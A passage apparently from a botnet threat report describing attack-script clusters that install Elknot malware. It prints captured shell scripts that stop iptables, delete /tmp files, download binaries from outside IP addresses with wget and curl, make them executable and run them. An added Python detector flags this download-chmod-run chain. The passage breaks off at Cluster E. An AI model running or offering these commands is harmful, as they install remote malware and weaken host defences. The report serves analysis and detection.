service iptables stop
rm -r /tmp/*
wget -O /tmp/Hostys http://117.21.176.64:4899/http
chmod 777 /tmp/Hostys
nohup /tmp/Hostys > /dev/null 2>&1
/tmp/Hostys
./tmp/Hostys
wget -O /tmp/Hostus http://117.21.176.64:4899/http
chmod 777 /tmp/Hostys
nohup /tmp/Hostys > /dev/null 2>&1
/tmp/Hostys
./tmp/Hostys
wget -O /tmp/Hostus http://117.21.176.64:4899/http
su root
chmod 777 /tmp/Hostys
nohup /tmp/Hostys > /dev/null 2>&1
/tmp/Hostys
./tmp/Hostys
wget -O /tmp/Hostus http://117.21.176.64:4899/http
chmod 777 /tmp/Hostys
nohup /tmp/Hostys > /dev/null 2>&1
/tmp/Hostys
./tmp/Hostys
wget -O /tmp/Hostus http://117.21.176.64:4899/http
4.1.4 INFRASTRUCTURE-TTP CLUSTER D ATTACK SCRIPT
Cluster D attempted to install Elknot malware on vulnerable systems. Unlike the previously identified Clusters, Cluster D used a very short sequence of commands to attempt to infect a vulnerable host. The entire attack script consists of 6 commands executed over a 21 second time frame:
rm *
curl -o /tmp/down http://183.61.171.225:8818/down
wget -c http://183.61.171.225:8818/down
chmod 777 /tmp/./down
/tmp/./down
rm /tmp/*
The simplicity of the attack script suggests that the actor does not have any type of automated feedback loop on whether an attack was successful or not. At the very least, however, the attacker was resourceful enough to use two different command line download tools to increase the chances of a download, and potential infection, being successful.
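The scripts above (the Hostys sequence and the Cluster D sequence) share one shape: fetch a file into /tmp with wget or curl, chmod it executable, run it, then clean up. The following is an added detection example, not code from the report, that replays a captured command sequence (for instance from a honeypot shell log) and reports whether that full chain occurred, which download tools were used, and whether the firewall was stopped or /tmp was wiped. The path normalisation treats the attackers' "/tmp/./down" and "./tmp/Hostys" spellings as /tmp paths, and the embedded sample uses a constructed TEST-NET address instead of the real host.

```python
import os
import re
from dataclasses import dataclass, field

# Added example (not the report's code): flag the download -> chmod +x -> run chain.
DOWNLOAD_RE = re.compile(r"^(?:nohup\s+)?(wget|curl)\b")
URL_RE = re.compile(r"https?://\S+")
OUTFILE_RE = re.compile(r"-[oO]\s+(\S+)")
CHMOD_RE = re.compile(r"^chmod\s+(\d{3,4})\s+(\S+)")
EXEC_RE = re.compile(r"^(?:nohup\s+)?(\.?/tmp/\S+)")

def normalize(path):
    # "/tmp/./down" and the attackers' "./tmp/down" typo both mean /tmp/down.
    return os.path.normpath(path.lstrip("."))

@dataclass
class Verdict:
    tools: set = field(default_factory=set)       # download tools used
    downloaded: set = field(default_factory=set)  # files fetched
    chmod_exec: set = field(default_factory=set)  # files made executable
    executed: set = field(default_factory=set)    # files run
    firewall_stopped: bool = False
    cleanup: bool = False

    @property
    def infection_chain(self):
        # Files that were fetched, made executable and then run.
        return self.downloaded & self.chmod_exec & self.executed

def analyze(commands):
    v = Verdict()
    for cmd in (c.strip() for c in commands):
        if (m := DOWNLOAD_RE.match(cmd)) and (url := URL_RE.search(cmd)):
            v.tools.add(m.group(1))
            out = OUTFILE_RE.search(cmd)  # wget -O / curl -o, else URL basename
            v.downloaded.add(normalize(out.group(1)) if out else os.path.basename(url.group(0)))
        elif (m := CHMOD_RE.match(cmd)) and int(m.group(1)[-3:], 8) & 0o111:
            v.chmod_exec.add(normalize(m.group(2)))
        elif m := EXEC_RE.match(cmd):
            v.executed.add(normalize(m.group(1)))
        elif re.match(r"^service\s+iptables\s+stop", cmd):
            v.firewall_stopped = True
        elif re.match(r"^rm\s+(-\S+\s+)?(/tmp/)?\*", cmd):
            v.cleanup = True
    return v

# Constructed sample shaped like the Cluster D script (TEST-NET address, not the real host).
CLUSTER_D_LIKE = ["rm *", "curl -o /tmp/down http://203.0.113.5:8818/down",
                  "wget -c http://203.0.113.5:8818/down", "chmod 777 /tmp/./down",
                  "/tmp/./down", "rm /tmp/*"]
```

Running analyze(CLUSTER_D_LIKE) yields an infection chain of {"/tmp/down"} with both curl and wget recorded as download tools, which is the dual-tool behaviour the text describes.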
4.1.5 INFRASTRUCTURE-TTP CLUSTER E ATTACK SCRIPT
The attack script of Cluster E is by far the most simplistic and ineffective example of all the Clusters' attack scripts. The attack script consists of the single line
THE ELASTIC BOTNET REPORT
50